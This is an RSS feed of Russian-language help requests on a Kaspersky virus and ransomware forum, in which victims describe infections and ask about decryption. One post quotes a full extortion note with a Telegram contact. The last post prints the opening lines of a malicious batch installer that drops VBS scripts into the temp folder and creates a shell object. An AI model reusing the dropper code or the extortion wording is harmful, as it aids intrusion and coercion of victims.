<?xml version="1.0"?>
<rss version="2.0"><channel><title>&#x412;&#x43E;&#x43F;&#x440;&#x43E;&#x441;&#x44B;, &#x441;&#x432;&#x44F;&#x437;&#x430;&#x43D;&#x43D;&#x44B;&#x435; &#x441; &#x432;&#x438;&#x440;&#x443;&#x441;&#x430;&#x43C;&#x438; &#x438; &#x448;&#x438;&#x444;&#x440;&#x43E;&#x432;&#x430;&#x43B;&#x44C;&#x449;&#x438;&#x43A;&#x430;&#x43C;&#x438; Latest Topics</title><link>https://forum.kaspersky.com/forum/%D0%B2%D0%BE%D0%BF%D1%80%D0%BE%D1%81%D1%8B-%D1%81%D0%B2%D1%8F%D0%B7%D0%B0%D0%BD%D0%BD%D1%8B%D0%B5-%D1%81-%D0%B2%D0%B8%D1%80%D1%83%D1%81%D0%B0%D0%BC%D0%B8-%D0%B8-%D1%88%D0%B8%D1%84%D1%80%D0%BE%D0%B2%D0%B0%D0%BB%D1%8C%D1%89%D0%B8%D0%BA%D0%B0%D0%BC%D0%B8-158/</link><description>&#x412;&#x43E;&#x43F;&#x440;&#x43E;&#x441;&#x44B;, &#x441;&#x432;&#x44F;&#x437;&#x430;&#x43D;&#x43D;&#x44B;&#x435; &#x441; &#x432;&#x438;&#x440;&#x443;&#x441;&#x430;&#x43C;&#x438; &#x438; &#x448;&#x438;&#x444;&#x440;&#x43E;&#x432;&#x430;&#x43B;&#x44C;&#x449;&#x438;&#x43A;&#x430;&#x43C;&#x438; Latest Topics</description><language>en</language><item><title>&#x447;&#x442;&#x43E; &#x44D;&#x442;&#x43E; &#x431;&#x44B;&#x43B;&#x43E;?</title><link>https://forum.kaspersky.com/topic/%D1%87%D1%82%D0%BE-%D1%8D%D1%82%D0%BE-%D0%B1%D1%8B%D0%BB%D0%BE-59566/</link><description><![CDATA[<p>
	сегодня я решил просканировать мою систему ждал 1 час и потом показал 15 дедектов из которых был Trojan.Win64.Agent.Smevay lib.dll и Trojan.JS.Trolec.gen закинул их в каратин и они были по пути C:/Users/Егор/appdata/Local/utorrentclients-updater\installer.exe и C:/Users/Егор/AppData/Roaming/utorrent я в безопасности? также я ничего не скачивал был ли это вредоносный сайт или Drivet-By?
</p>

<p>
	на всякий P.S. Пишу сюда, так как в профильном разделе система не дает создать тему без логов Автологгера. Проги качать не хочу, мне не нужно лечение, просто ответьте по скриншоту, что это было
</p>

<p>
	<a class="ipsAttachLink ipsAttachLink_image" data-fileext="png" data-fileid="40090" href="https://forum.kaspersky.com/uploads/monthly_2026_08/2026-08-13193443.png.01ab866885120847f91f1a734bfbb79d.png" rel=""><img alt="Снимок экрана 2026-08-13 193443.png" class="ipsImage ipsImage_thumbnailed" data-fileid="40090" data-ratio="80" style="height:auto;" width="500" data-src="https://forum.kaspersky.com/uploads/monthly_2026_08/2026-08-13193443.thumb.png.b86277dfa19cc83508e742f9b2e69e1e.png" src="https://forum.kaspersky.com/applications/core/interface/js/spacer.png" /></a>
</p>
]]></description><guid isPermaLink="false">59566</guid><pubDate>Thu, 13 Aug 2026 11:53:39 +0000</pubDate></item><item><title>&#x417;&#x430;&#x448;&#x438;&#x444;&#x440;&#x43E;&#x432;&#x430;&#x43B;&#x438; begood327</title><link>https://forum.kaspersky.com/topic/%D0%B7%D0%B0%D1%88%D0%B8%D1%84%D1%80%D0%BE%D0%B2%D0%B0%D0%BB%D0%B8-begood327-58916/</link><description><![CDATA[<p>
	Всем доброго времени суток!
</p>

<p>
	Нужна помощь! Зашифровали сервер и рабочие станции. <br />
	на сервере весит на черном экране написать на телеграмм begood327 и ввод пароля. Раздел С на диске зашифрован. На одном компьютере шифровка не сработала и антивирус Касперского отправил в карантин mesh.exe. Программа Diskcryptor видит зашифрованный диск и просит пароль для расшифровки. Подскажите кто сталкивался с таким что делать? Бэкапов нет 
</p>

<p>
	антивирус Касперского куплен и был установлен на все компьютеры 
</p>

<p><a href="https://forum.kaspersky.com/uploads/monthly_2026_05/IMG_2424.jpeg.f01173e443992d4ea60bafdef992c368.jpeg" class="ipsAttachLink ipsAttachLink_image" ><img data-fileid="39013" src="https://forum.kaspersky.com/applications/core/interface/js/spacer.png" data-src="https://forum.kaspersky.com/uploads/monthly_2026_05/IMG_2424.thumb.jpeg.dbfe993ad093ec5939fb0f7747bbd25e.jpeg" data-ratio="42.4" width="500" class="ipsImage ipsImage_thumbnailed" alt="IMG_2424.jpeg"></a></p>]]></description><guid isPermaLink="false">58916</guid><pubDate>Sun, 17 May 2026 05:18:52 +0000</pubDate></item><item><title>&#x41D;&#x430; &#x442;&#x435;&#x43B;&#x435;&#x444;&#x43E;&#x43D;&#x435; &#x432;&#x438;&#x440;&#x443;&#x441; &#x441; &#x440;&#x435;&#x43A;&#x43B;&#x430;&#x43C;&#x43E;&#x439;, &#x41A;&#x430;&#x441;&#x43F;&#x435;&#x440;&#x441;&#x43A;&#x438;&#x439; &#x43B;&#x43E;&#x432;&#x438;&#x442;, &#x43D;&#x43E; &#x43E;&#x43D; &#x432;&#x43E;&#x437;&#x432;&#x440;&#x430;&#x449;&#x430;&#x435;&#x442;&#x441;&#x44F;, &#x447;&#x442;&#x43E; &#x434;&#x435;&#x43B;&#x430;&#x442;&#x44C;?</title><link>https://forum.kaspersky.com/topic/%D0%BD%D0%B0-%D1%82%D0%B5%D0%BB%D0%B5%D1%84%D0%BE%D0%BD%D0%B5-%D0%B2%D0%B8%D1%80%D1%83%D1%81-%D1%81-%D1%80%D0%B5%D0%BA%D0%BB%D0%B0%D0%BC%D0%BE%D0%B9-%D0%BA%D0%B0%D1%81%D0%BF%D0%B5%D1%80%D1%81%D0%BA%D0%B8%D0%B9-%D0%BB%D0%BE%D0%B2%D0%B8%D1%82-%D0%BD%D0%BE-%D0%BE%D0%BD-%D0%B2%D0%BE%D0%B7%D0%B2%D1%80%D0%B0%D1%89%D0%B0%D0%B5%D1%82%D1%81%D1%8F-%D1%87%D1%82%D0%BE-%D0%B4%D0%B5%D0%BB%D0%B0%D1%82%D1%8C-59401/</link><description><![CDATA[<p>
	Всем привет. Нужна помощь, сам уже запутался.
</p>

<p>
	Телефон, Cubot KingKong X, Android 14. Антивирус, бесплатный Kaspersky для Android из Play Маркета, всегда обновляю, так что версия самая свежая (точный номер не смотрел).<br />
	<br />
	Что происходит по порядку:<br />
	- Пользуюсь телефоном около двух лет, раньше всё было нормально, Касперский изредка что-то находил и вычищал.<br />
	- Примерно неделю назад началось: при запуске приложений стали выскакивать рекламные баннеры, закрываются с трудом.<br />
	- Заодно на телефон само собой лезет какое-то странное приложение «Система Android», Касперский блокирует его как троян (HEUR:Trojan-Proxy.AndroidOS.Vo1d.b), но оно появляется снова и снова.<br />
	- Ещё проверил телефон программой Dr.Web, она нашла Android.Triada.6320 в системном файле /system/lib64/libandroid_runtime.so.<br />
	<br />
	Погуглил, пишут, что это какой-то серьёзный вирус в самой прошивке и обычным сбросом не убирается. Но я в этом не разбираюсь, поэтому и пишу сюда.<br />
	<br />
	За аккаунты уже не переживаю, пароли и двухфакторку сменил с другого, чистого устройства. Остался вопрос по самому телефону:<br />
	<br />
	1. Что это вообще такое и насколько опасно (кроме рекламы)?<br />
	2. Как это убрать и реально ли вообще?<br />
	3. Поможет ли сброс до заводских настроек, или бесполезно?<br />
	4. Можно ли потом спокойно пользоваться телефоном, держать банки, Госуслуги, или лучше не рисковать?
</p>

<p>
	Скрин с тем, что нашёл Касперский, прикладываю. Готов сделать что скажете, даже что-то сложное, если объясните по шагам.
</p>

<p>
	Заранее спасибо!
</p>

<p>
	<a class="ipsAttachLink ipsAttachLink_image" data-fileext="jpg" data-fileid="39836" href="https://forum.kaspersky.com/uploads/monthly_2026_07/2026-07-2419_27_51.jpg.4b0e8550574b8ae9e24d9b0b2f0f9087.jpg" rel=""><img alt="2026-07-24 19.27.51.jpg" class="ipsImage ipsImage_thumbnailed" data-fileid="39836" data-ratio="222.22" style="height:auto;" width="225" data-src="https://forum.kaspersky.com/uploads/monthly_2026_07/2026-07-2419_27_51.thumb.jpg.ade7c43d2f9f35921f2663179c7a0728.jpg" src="https://forum.kaspersky.com/applications/core/interface/js/spacer.png" /></a><a class="ipsAttachLink ipsAttachLink_image" data-fileext="jpg" data-fileid="39837" href="https://forum.kaspersky.com/uploads/monthly_2026_07/2026-07-2419_27_49.jpg.9c7d00a7628f16491942d9a7de39d6ae.jpg" rel=""><img alt="2026-07-24 19.27.49.jpg" class="ipsImage ipsImage_thumbnailed" data-fileid="39837" data-ratio="222.22" style="height:auto;" width="225" data-src="https://forum.kaspersky.com/uploads/monthly_2026_07/2026-07-2419_27_49.thumb.jpg.d317489cba134c179b7de7f34b5502be.jpg" src="https://forum.kaspersky.com/applications/core/interface/js/spacer.png" /></a>
</p>

<p>
	upd: я удаляю если Касперский меня просит об этом, только почти в ту же секунду/минуту она появляется в предупреждениях, может вообще в рандомное время это сделать, никаких закономерностей.
</p>
]]></description><guid isPermaLink="false">59401</guid><pubDate>Fri, 24 Jul 2026 22:32:41 +0000</pubDate></item><item><title>&#x412;&#x418;&#x420;&#x423;&#x421; &#x428;&#x418;&#x424;&#x420;&#x41E;&#x412;&#x410;&#x41B;&#x42C;&#x429;&#x418;&#x41A;-&#x41F;&#x41E;&#x41C;&#x41E;&#x413;&#x418;&#x422;&#x415; &#x41F;&#x41E;&#x416;&#x410;&#x41B;&#x423;&#x419;&#x421;&#x422;&#x410;</title><link>https://forum.kaspersky.com/topic/%D0%B2%D0%B8%D1%80%D1%83%D1%81-%D1%88%D0%B8%D1%84%D1%80%D0%BE%D0%B2%D0%B0%D0%BB%D1%8C%D1%89%D0%B8%D0%BA-%D0%BF%D0%BE%D0%BC%D0%BE%D0%B3%D0%B8%D1%82%D0%B5-%D0%BF%D0%BE%D0%B6%D0%B0%D0%BB%D1%83%D0%B9%D1%81%D1%82%D0%B0-59328/</link><description><![CDATA[<p>
	Добрый день. Примерно в 2016 году зашифровались личные фотографии и видео за много лет на стационарном компьютере , на тот момент не было решения этой проблемы и все зашифрованные файлы были перенесены на флешку. Исходных файлов к сожелению неосталось. В прикрепленных файлах лежит фото какэти файлы выглядят но к сожелению я их прикрепить неполучается из за несоотвецтвия формата файла<a class="ipsAttachLink ipsAttachLink_image" href="https://forum.kaspersky.com/uploads/monthly_2026_07/2026-07-14210507.png.76375b3d2ebb51f18ba936a9f719fb39.png" data-fileid="39712" data-fileext="png" rel=""><img class="ipsImage ipsImage_thumbnailed" data-fileid="39712" data-ratio="23.60" width="500" alt="2026-07-14210507.thumb.png.90ee74c7866d947015394b7848809fe6.png" data-src="https://forum.kaspersky.com/uploads/monthly_2026_07/2026-07-14210507.thumb.png.90ee74c7866d947015394b7848809fe6.png" src="https://forum.kaspersky.com/applications/core/interface/js/spacer.png" /></a>. Если у вас есть метод для их расшифровки то буду очень вам признателен за помощь.Зарание спасибо.
</p>
<p>
	*****@*****.tld-CL 1.3.0.0.id-LMNNOOPQQRSSSTUUVWWWXXYZAABBBCDDEFFF-29.05.2016 21@*****@*****.tld
</p>

<p>
	 
</p>

<p>
	Так выглядит полное название одного из зашифрованного файла
</p>
<p>
	<a class="ipsAttachLink ipsAttachLink_image" href="https://forum.kaspersky.com/uploads/monthly_2026_07/image.png.27ddc82eb2c295b5e76cf674eae0a215.png" data-fileid="39713" data-fileext="png" rel=""><img class="ipsImage ipsImage_thumbnailed" data-fileid="39713" data-ratio="6.60" width="500" alt="image.thumb.png.78e4e392782fc0cfba419ff2fd954322.png" data-src="https://forum.kaspersky.com/uploads/monthly_2026_07/image.thumb.png.78e4e392782fc0cfba419ff2fd954322.png" src="https://forum.kaspersky.com/applications/core/interface/js/spacer.png" /></a>
</p>
]]></description><guid isPermaLink="false">59328</guid><pubDate>Tue, 14 Jul 2026 19:09:41 +0000</pubDate></item><item><title>&#x422;&#x440;&#x435;&#x431;&#x443;&#x435;&#x442;&#x441;&#x44F; &#x430;&#x443;&#x442;&#x435;&#x43D;&#x442;&#x438;&#x444;&#x438;&#x43A;&#x430;&#x446;&#x438;&#x44F; &#x43F;&#x440;&#x438; &#x432;&#x445;&#x43E;&#x434;&#x435; &#x432; Google Chrom</title><link>https://forum.kaspersky.com/topic/%D1%82%D1%80%D0%B5%D0%B1%D1%83%D0%B5%D1%82%D1%81%D1%8F-%D0%B0%D1%83%D1%82%D0%B5%D0%BD%D1%82%D0%B8%D1%84%D0%B8%D0%BA%D0%B0%D1%86%D0%B8%D1%8F-%D0%BF%D1%80%D0%B8-%D0%B2%D1%85%D0%BE%D0%B4%D0%B5-%D0%B2-google-chrom-59147/</link><description><![CDATA[<p>
	Добрый день! Сегодня столкнулся с проблемой, при открытии браузера хром - открывается окно с предложением пройти аутентификацию для сайта lh3.googleusercontent.com, причем это происходит на двух устройствах (ПК и ноутбуке).
</p>

<p>
	В настройках расширений хром есть надпись "этим браузером управляет ваша организация".
</p>

<p>
	Также в хром есть политика, которую я не устанавливал (во всяком случае не помню этого).
</p>

<p>
	После смены пароля google аккаунта и выхода на всех устройствах - сообщение пропало.
</p>

<p>
	Проверка антивирусом Касперского результатов не дала. Хром на всякий случай удалил. 
</p>

<p>
	Что это может быть?
</p>

<p><a href="https://forum.kaspersky.com/uploads/monthly_2026_06/2026-06-16_16-02-04.png.62c3fccb04cd0458a90d12649aeb6cac.png" class="ipsAttachLink ipsAttachLink_image" ><img data-fileid="39353" src="https://forum.kaspersky.com/applications/core/interface/js/spacer.png" data-src="https://forum.kaspersky.com/uploads/monthly_2026_06/2026-06-16_16-02-04.thumb.png.732bcbd89242b275943af33cb4c0716f.png" data-ratio="56.4" width="500" class="ipsImage ipsImage_thumbnailed" alt="2026-06-16_16-02-04.png"></a></p>
<p><a href="https://forum.kaspersky.com/uploads/monthly_2026_06/2026-06-16_16-57-05.png.bc137aaa644054ea7750082afeb8d440.png" class="ipsAttachLink ipsAttachLink_image" ><img data-fileid="39354" src="https://forum.kaspersky.com/applications/core/interface/js/spacer.png" data-src="https://forum.kaspersky.com/uploads/monthly_2026_06/2026-06-16_16-57-05.thumb.png.e18ad0047cf91c2d08a85d6c6a92c01e.png" data-ratio="56.4" width="500" class="ipsImage ipsImage_thumbnailed" alt="2026-06-16_16-57-05.png"></a></p>
<p><a href="https://forum.kaspersky.com/uploads/monthly_2026_06/2026-06-16_17-05-57.png.d83b750d3587976580feeb652298bd42.png" class="ipsAttachLink ipsAttachLink_image" ><img data-fileid="39355" src="https://forum.kaspersky.com/applications/core/interface/js/spacer.png" data-src="https://forum.kaspersky.com/uploads/monthly_2026_06/2026-06-16_17-05-57.thumb.png.c2d3a320c5c346e350186783fd6b47ec.png" data-ratio="56.4" width="500" class="ipsImage ipsImage_thumbnailed" alt="2026-06-16_17-05-57.png"></a></p>]]></description><guid isPermaLink="false">59147</guid><pubDate>Tue, 16 Jun 2026 15:38:00 +0000</pubDate></item><item><title>&#x412;&#x438;&#x440;&#x443;&#x441; Ground &#x43A;&#x430;&#x43A; &#x438;&#x437;&#x431;&#x430;&#x432;&#x438;&#x442;&#x44C;&#x441;&#x44F; ?</title><link>https://forum.kaspersky.com/topic/%D0%B2%D0%B8%D1%80%D1%83%D1%81-ground-%D0%BA%D0%B0%D0%BA-%D0%B8%D0%B7%D0%B1%D0%B0%D0%B2%D0%B8%D1%82%D1%8C%D1%81%D1%8F-58961/</link><description><![CDATA[<p>
	Windows 10 в основном, но может быть и Windows 7, 11
</p>

<p>
	В основном тут появляется, но могут и другие файлы заражаться. После удаления опять появляется. Особенно если видимо подключить съёмные носители, где есть вирус.
</p>

<p>
	Тип: Вирус<br />
	Название: Virus.Win32.Renamer.j<br />
	Точность: Точно<br />
	Степень угрозы: Высокая<br />
	Тип объекта: Файл<br />
	Имя объекта: Ground.exe<br />
	Путь к объекту: C:\Users\Дмитрий\AppData\Roaming<br />
	MD5 объекта: 0E54CD5BF552F73867A28525921CAD0F
</p>

<p>
	Есть какие то специализированные утилиты для борьбы с это заразой ?  Обычная версия антивирусной программы не очень то помогает. Слишком много всего находит, что не нужно удалять.
</p>

<p>
	Хорошо бы если сделали утилиту именно под этот вирус, чтобы проверяло и не позволяло распространяться. И искало всё файлы начинающиеся на G, особенно если есть такой же файл, но без буквы G впереди и проверяло что внутри файла.  Остальное бы ничего не проверяло.
</p>

<p>
	Вроде бы вирус старый и простой, но Антивирусы, в том числе Касперского с ним не справляются...
</p>
]]></description><guid isPermaLink="false">58961</guid><pubDate>Fri, 22 May 2026 05:18:37 +0000</pubDate></item><item><title>PDM:Exploit.Win32.Generic</title><link>https://forum.kaspersky.com/topic/pdmexploitwin32generic-58721/</link><description><![CDATA[<p>
	Доброго дня.
</p>

<p>
	В разделе "Защита от эксплоитов" каждый день получаю сообщение об обнаружении этого вредоносного объекта на системном приожении svchost. Сканирование системы выявило 10 файлов с подписью not-a-virus. 
</p>

<p>
	Событие: Запрещено<br />
	Приложение: Host Process for Windows Services<br />
	Пользователь: NT AUTHORITY\СИСТЕМА<br />
	Тип пользователя: Системный пользователь<br />
	Компонент: Защита от эксплойтов<br />
	Описание результата: Запрещено<br />
	Тип: Троянское приложение<br />
	Название: PDM:Exploit.Win32.Generic
</p>

<p>
	Собрал трейс-файлы (логи). Могу ли я их вам отправить?
</p>
]]></description><guid isPermaLink="false">58721</guid><pubDate>Mon, 20 Apr 2026 12:31:41 +0000</pubDate></item><item><title>&#x421;&#x43B;&#x43E;&#x432;&#x438;&#x43B; &#x432;&#x438;&#x440;&#x443;&#x441; &#x441; &#x431;&#x438;&#x442;&#x43B;&#x43E;&#x43A;&#x435;&#x440;&#x43E;&#x43C;</title><link>https://forum.kaspersky.com/topic/%D1%81%D0%BB%D0%BE%D0%B2%D0%B8%D0%BB-%D0%B2%D0%B8%D1%80%D1%83%D1%81-%D1%81-%D0%B1%D0%B8%D1%82%D0%BB%D0%BE%D0%BA%D0%B5%D1%80%D0%BE%D0%BC-58868/</link><description><![CDATA[<p>
	Только переустановил винду (Ноут Novisea m2) скачал то что мне надо, OBS вк мессенджер, дискорд, Яндекс, и пошёл работать, ноут был на зарядке включен, я прихожу, он выключен, включаю и вижу битлокер, что делать?
</p>

<p><a href="https://forum.kaspersky.com/uploads/monthly_2026_05/IMG_20260509_190413_797.jpg.5382c8710fd2f86bd7c7a0d5438b0326.jpg" class="ipsAttachLink ipsAttachLink_image" ><img data-fileid="38910" src="https://forum.kaspersky.com/applications/core/interface/js/spacer.png" data-src="https://forum.kaspersky.com/uploads/monthly_2026_05/IMG_20260509_190413_797.thumb.jpg.32e1d9d2ea799315d6b2f831636a93da.jpg" data-ratio="75" width="500" class="ipsImage ipsImage_thumbnailed" alt="IMG_20260509_190413_797.jpg"></a></p>]]></description><guid isPermaLink="false">58868</guid><pubDate>Sat, 09 May 2026 16:38:37 +0000</pubDate></item><item><title>Kaspersky &#x43D;&#x435; &#x43C;&#x43E;&#x436;&#x435;&#x442; &#x443;&#x434;&#x430;&#x43B;&#x438;&#x442;&#x44C; HEUR:Trojan.VBS.SAgent.gen</title><link>https://forum.kaspersky.com/topic/kaspersky-%D0%BD%D0%B5-%D0%BC%D0%BE%D0%B6%D0%B5%D1%82-%D1%83%D0%B4%D0%B0%D0%BB%D0%B8%D1%82%D1%8C-heurtrojanvbssagentgen-58846/</link><description><![CDATA[<p>
	Kaspersky не может удалить найденное троянское приложение HEUR:Trojan.VBS.SAgent.gen. Причина - невозможно создать резервную копию.
</p>

<p>
	Путь к объекту - C:\Recovery\Customizations\FactoryApps.ppkg//ICB\0\MachineSpecific\File\C$\SWSetup\APP\Applications\HP\Win10Welc_NN4RB2\1.0.502.733\src. Но проводник такой путь не находит.
</p>

<p>
	Как быть?
</p>
]]></description><guid isPermaLink="false">58846</guid><pubDate>Wed, 06 May 2026 05:43:52 +0000</pubDate></item><item><title>&#x41F;&#x43E;&#x43C;&#x43E;&#x433;&#x438;&#x442;&#x435; &#x440;&#x430;&#x441;&#x448;&#x438;&#x444;&#x440;&#x43E;&#x432;&#x430;&#x442;&#x44C; &#x444;&#x430;&#x439;&#x43B;&#x44B; &#x2014; &#x440;&#x430;&#x441;&#x448;&#x438;&#x440;&#x435;&#x43D;&#x438;&#x435; .061117da4e327cac (GenieLocker)</title><link>https://forum.kaspersky.com/topic/%D0%BF%D0%BE%D0%BC%D0%BE%D0%B3%D0%B8%D1%82%D0%B5-%D1%80%D0%B0%D1%81%D1%88%D0%B8%D1%84%D1%80%D0%BE%D0%B2%D0%B0%D1%82%D1%8C-%D1%84%D0%B0%D0%B9%D0%BB%D1%8B-%E2%80%94-%D1%80%D0%B0%D1%81%D1%88%D0%B8%D1%80%D0%B5%D0%BD%D0%B8%D0%B5-061117da4e327cac-genielocker-58847/</link><description><![CDATA[<p>
	Здравствуйте,
</p>

<p>
	Мои файлы зашифрованы программой-вымогателем. Прошу помочь точно определить <br />
	вариант и найти дешифратор, если он существует.
</p>

<p>
	**Подробности заражения:**<br />
	- Добавленное расширение: .061117da4e327cac<br />
	- Затронутые файлы: .pdf, .docx, .dwg, .xlsx (всего 4 файла)<br />
	- Файл с требованием выкупа: выкуп.txt<br />
	- Содержание записки: "For data recovery, contacts us via Telegram Messenger @rahja1001"
</p>

<p>
	**Идентификация:**<br />
	- HEX-анализ конца зашифрованного файла содержит строку: GENIELOCK<br />
	- Это указывает на семейство вымогателя GenieLocker<br />
	- Проверено на NoMoreRansom.org — дешифратора нет<br />
	- Резервные копии тоже зашифрованы
</p>

<p>
	**Первые 64 байта зашифрованного файла:**<br />
	6E 13 16 0D C5 E0 44 52 22 D8 33 00 B3 DE 49 3A <br />
	1C F1 6B A6 EB 20 68 70 A9 F5 A6 88 D8 D5 15 CE <br />
	EC 5B A8 9C F4 05 5F CE 54 1D EE 60 5A ED 69 D4 <br />
	BF 1C A6 9A FF 1F 26 F9 CA 6B B2 7B 2D FB 2D 40
</p>

<p>
	**Последние 64 байта зашифрованного файла:**<br />
	95 19 27 E7 A8 6D 0C E8 F1 BF C8 4F 52 E2 51 C4 <br />
	5C A3 F1 9A 5E C9 A6 CB 85 7B 45 85 9E DC DC D2 <br />
	5A 29 2F 18 DB 31 C0 2E C1 84 70 F5 78 3C 29 B7 <br />
	00 00 00 30 01 00 00 47 45 4E 49 45 4C 4F 43 4B
</p>

<p>
	Буду очень благодарен за любую помощь в определении точного варианта и <br />
	наличия дешифратора. Платить выкуп я не планирую.<br />
	<br />
	Так же сообщаю что на компьютерах и серверах был установлен антивирус Касперского KES
</p>

<p>
	Спасибо.<br />
	 
</p>

<p><a href="https://forum.kaspersky.com/uploads/monthly_2026_05/2026-05-06111910.jpg.c35c04871aef2b62906efa5365265854.jpg" class="ipsAttachLink ipsAttachLink_image" ><img data-fileid="38859" src="https://forum.kaspersky.com/applications/core/interface/js/spacer.png" data-src="https://forum.kaspersky.com/uploads/monthly_2026_05/2026-05-06111910.thumb.jpg.bfe8259f0c088736e5ab4b7c22ab6b0e.jpg" data-ratio="19.6" width="500" class="ipsImage ipsImage_thumbnailed" alt="Снимок экрана 2026-05-06 111910.jpg"></a></p>]]></description><guid isPermaLink="false">58847</guid><pubDate>Wed, 06 May 2026 08:21:07 +0000</pubDate></item><item><title>&#x41F;&#x43E;&#x43C;&#x43E;&#x433;&#x438;&#x442;&#x435; &#x440;&#x430;&#x441;&#x448;&#x438;&#x444;&#x440;&#x43E;&#x432;&#x430;&#x442;&#x44C; &#x431;&#x430;&#x437;&#x443; 1&#x441; &#x438; &#x434;&#x43E;&#x43A;&#x438;</title><link>https://forum.kaspersky.com/topic/%D0%BF%D0%BE%D0%BC%D0%BE%D0%B3%D0%B8%D1%82%D0%B5-%D1%80%D0%B0%D1%81%D1%88%D0%B8%D1%84%D1%80%D0%BE%D0%B2%D0%B0%D1%82%D1%8C-%D0%B1%D0%B0%D0%B7%D1%83-1%D1%81-%D0%B8-%D0%B4%D0%BE%D0%BA%D0%B8-58789/</link><description><![CDATA[<p>
	<br />
	Текст сообщения от пиратов:<br />
	<br />
	Your System is Encrypted !
</p>

<p>
	Good news for you:
</p>

<p>
	   1) We can restore your entire system.<br />
	   2) We are not interested in publishing your information.<br />
	   3) Our motivation is purely financial.<br />
	   4) We are open to negotiations.<br />
	   5) We are ready to maintain complete confidentiality of this incident.
</p>

<p>
	Let's explain the further steps in the situation:
</p>

<p>
	    You can seek help from authorities - unfortunately, this path will not lead to a constructive resolution of the situation. <br />
	        They will not assist you with decryption, seize your servers for OPsec, and your company's operations will be halted.<br />
	        Subsequently, the date will be disclosed, leading to fines, legal actions, and reputational damage.<br />
	    OR<br />
	    You initiate negotiations with us, and we reach a mutually beneficial and constructive solution for both parties.<br />
	        You pay a specified amount and receive the full decryption, support throughout the decryption process, <br />
	        proofs that all information on our servers has been deleted, and a guarantee that it will never resurface, <br />
	        ensuring no one learns about this incident.
</p>

<p>
	To confirm our honest intentions.Send 2 different random files and you will get it decrypted.<br />
	It can be from different computers on your network to be sure that one key decrypts everything.<br />
	2 files we unlock for free 
</p>

<p>
	To initiate negotiations, please write us a message to our telegram
</p>

<p>
	Telegram : <span>https: //t.me/ ADFScorp</span>
</p>

<p>
	If you do not receive a response within 24 hours, please send us an email.
</p>

<p>
	Mail : *****@*****.tld
</p>

<p>
	There will be no bad news for your company after successful negotiations for both sides. But there will be plenty of those bad news if case of failed negotiations, so don’t think about how to avoid it.
</p>

<p>
	Just focus on negotiations, payment and decryption to make all of your problems solved by our specialists within 1 day after payment received: servers and data restored, everything will work good as new.
</p>

<p>
	If you contact us after 72 hours of the incident, the initial price will increase, so contact us soon.<br />
	<br />
	Сам файл <span>https://drive.google.com/file/d/1wpHqp1pG-iEP8kUvuj4TohcfBD4QIBtx/view?usp=drive_link</span>
</p>
]]></description><guid isPermaLink="false">58789</guid><pubDate>Tue, 28 Apr 2026 06:46:17 +0000</pubDate></item><item><title>&#x43F;&#x43E;&#x43C;&#x43E;&#x433;&#x438;&#x442;&#x435; &#x440;&#x430;&#x441;&#x448;&#x438;&#x444;&#x440;&#x43E;&#x432;&#x430;&#x442;&#x44C; &#x434;&#x430;&#x43D;&#x43D;&#x44B;&#x435;</title><link>https://forum.kaspersky.com/topic/%D0%BF%D0%BE%D0%BC%D0%BE%D0%B3%D0%B8%D1%82%D0%B5-%D1%80%D0%B0%D1%81%D1%88%D0%B8%D1%84%D1%80%D0%BE%D0%B2%D0%B0%D1%82%D1%8C-%D0%B4%D0%B0%D0%BD%D0%BD%D1%8B%D0%B5-58694/</link><description><![CDATA[<p>
	Добрый день.
</p>

<p>
	Вирус-шифровальщик все файлы зашифровал. В конце каждого файла расширение .m6i7V6Glr .Прикладываю содержимое файла-требования его имя m6i7V6Glr.README.txt .
</p>

<p>
	<a class="ipsAttachLink ipsAttachLink_image" href="https://forum.kaspersky.com/uploads/monthly_2026_04/image.png.9c791824bc282799869d8e5784faae8d.png" data-fileid="38600" data-fileext="png" rel=""><img class="ipsImage ipsImage_thumbnailed" data-fileid="38600" data-ratio="52.00" width="500" alt="image.thumb.png.d6bbec2a5b1baf9c928ceda3a0246225.png" data-src="https://forum.kaspersky.com/uploads/monthly_2026_04/image.thumb.png.d6bbec2a5b1baf9c928ceda3a0246225.png" src="https://forum.kaspersky.com/applications/core/interface/js/spacer.png" /></a>
</p>

<p>
	Не могу понять, чем зашифрованы файлы и как их расшифровать. Crypto sheriff показывает что это "Lockbit 3.0" или"BlackBasta", но локбит утилита не может проверить по ID так как требуется 16 символов, а в файле-требовании ID какой-то странный и он 15 символов всего. А для блекбаста вообще ничего не смог найти.
</p>
]]></description><guid isPermaLink="false">58694</guid><pubDate>Wed, 15 Apr 2026 15:21:14 +0000</pubDate></item><item><title>&#x417;&#x430;&#x440;&#x430;&#x437;&#x438;&#x43B; &#x43A;&#x43E;&#x43C;&#x43F;&#x44C;&#x44E;&#x442;&#x435;&#x440; &#x432;&#x438;&#x440;&#x443;&#x441;&#x43E;&#x43C;</title><link>https://forum.kaspersky.com/topic/%D0%B7%D0%B0%D1%80%D0%B0%D0%B7%D0%B8%D0%BB-%D0%BA%D0%BE%D0%BC%D0%BF%D1%8C%D1%8E%D1%82%D0%B5%D1%80-%D0%B2%D0%B8%D1%80%D1%83%D1%81%D0%BE%D0%BC-58676/</link><description><![CDATA[<p>
	1. Windows 10 версии 22H2(Пиратка)
</p>

<p>
	2. Kaspersky Total Security 21.24(неактивен)
</p>

<p>
	Здравствуйте. Я веду небольшой блог по прохождению известных и малоизвестных игр. В связи с этим мне пишут некоторые разработчики со своими проектами. На этой почве ко мне втерлись в доверие хакеры. Они отправили мне батник с установкой непонятно чего, после запуска которого, как заверил главный мошенник происходят необратимые изменения в самом UEFI материнки. Почитал на сайтах, способа 2- перепрошить материнку программатором, либо купить новую. Денег нет совсем. Мошенники обещали "таблетку" за доступ к тг каналу и чату. Прилагаю код инсталлера и приложу все что попросите, увы сам Фаил вируса не дает прикрепить( скачать безопасно, не безопасно запускать installer) для изучения. Заплачу чем смогу, если кто-то реально объяснит проблему и напишет свою таблетку. Windows 10. Пиратка.
</p>

<p>
	Прилагаю скриншоты самого вируса и автозапуска в диспетчере задач(только фото есть, извините, пришлось на время решения проблемы лишить хакеров доступа к моему компу и отключить интернет)
</p>

<p>
	Текст батника-инсталлера:
</p>

<div class="ipsSpoiler" data-ipsspoiler="">
	<div class="ipsSpoiler_header">
		<span>Спойлер</span>
	</div>

	<div class="ipsSpoiler_contents">
		<p>
			@echo This app created by Niziast<br />
			@echo Niziast App<br />
			@echo Autor: Niziast, app created by Niziast<br />
			@echo off<br />
			echo Chr(39)&gt;%temp%\temp1.vbs<br />
			echo Chr(39)&gt;%temp%\temp2.vbs<br />
			echo on error resume next &gt; %temp%\temp.vbs<br />
			echo Set S = CreateObject("Wscript.Shell") &gt;&gt; %temp%\temp.vbs<br />
